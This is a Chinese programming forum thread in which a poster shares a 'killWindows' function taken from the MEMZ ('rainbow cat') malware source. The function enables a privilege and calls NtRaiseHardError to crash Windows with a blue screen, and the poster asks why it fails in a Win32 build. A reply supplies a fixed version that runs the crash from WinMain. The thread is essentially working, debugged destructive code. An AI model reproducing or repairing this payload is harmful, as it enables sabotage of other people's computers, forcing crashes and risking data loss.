关于raiseharderror在Win32程序中调用无效的问题
这是我从彩虹猫源码中拷贝的死机代码(有改动)#include<Windows.h>
#define fun_RtlAdjustPrivilege ((NTSTATUS(*)(DWORD, DWORD, BOOLEAN, LPBYTE))RtlAdjustPrivilege)//宏定义,方便调用
#define fun_NtRaiseHardError ((NTSTATUS(*)(DWORD, DWORD, DWORD, DWORD, DWORD, LPDWORD))NtRaiseHardError)
void killWindows()
{
HMODULE ntdll = LoadLibraryA("ntdll");//加载ntdll.dll
FARPROC RtlAdjustPrivilege = GetProcAddress(ntdll, "RtlAdjustPrivilege");//从ntdll.dll中提取出这两个函数的入口地址
FARPROC NtRaiseHardError = GetProcAddress(ntdll, "NtRaiseHardError");
if (RtlAdjustPrivilege != NULL && NtRaiseHardError != NULL)//如果两个都提取成功了,则执行
{
BOOLEAN tmp1; DWORD tmp2;
fun_RtlAdjustPrivilege(0x19, true, 0, &tmp1);//提升权限
fun_NtRaiseHardError(0xc0000022, 0, 0, 0, 6, &tmp2);//使电脑死机
}
else
{
MessageBox(NULL, L"执行失败!", L"提示", NULL);
}
}
这段代码,在控制台程序中可以成功执行,不用给管理员权限。而在win32程序中无效,也不是提取入口地址失败。大佬们可以解答一下吗?
#include <Windows.h>
#include <stdbool.h>
#define fun_RtlAdjustPrivilege ((NTSTATUS(*)(DWORD, DWORD, BOOLEAN, LPBYTE))RtlAdjustPrivilege)//宏定义,方便调用
#define fun_NtRaiseHardError ((NTSTATUS(*)(DWORD, DWORD, DWORD, DWORD, DWORD, LPDWORD))NtRaiseHardError)
void killWindows()
{
HMODULE ntdll = LoadLibraryA("ntdll");//加载ntdll.dll
FARPROC RtlAdjustPrivilege = GetProcAddress(ntdll, "RtlAdjustPrivilege");//从ntdll.dll中提取出这两个函数的入口地址
FARPROC NtRaiseHardError = GetProcAddress(ntdll, "NtRaiseHardError");
if (RtlAdjustPrivilege != NULL && NtRaiseHardError != NULL)//如果两个都提取成功了,则执行
{
BOOLEAN tmp1; DWORD tmp2;
// 提升权限
// 0x13 = SeShutdownPrivilege
fun_RtlAdjustPrivilege(0x13, true, 0, &tmp1);
// 使电脑死机
// 0x06 = OptionShutdownSystem
fun_NtRaiseHardError(0xc0000022, 0, 0, 0, 6, &tmp2);
}
else
{
//MessageBox(NULL, L"执行失败!", L"提示", NULL);
MessageBox(NULL, "执行失败!", "提示", MB_OK);
}
}
/*
int main(void) {
killWindows();
return 0;
}
*/
int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, PSTR szCmdLine, int iCmdShow)
{
killWindows();
return 0;
}
页:
[1]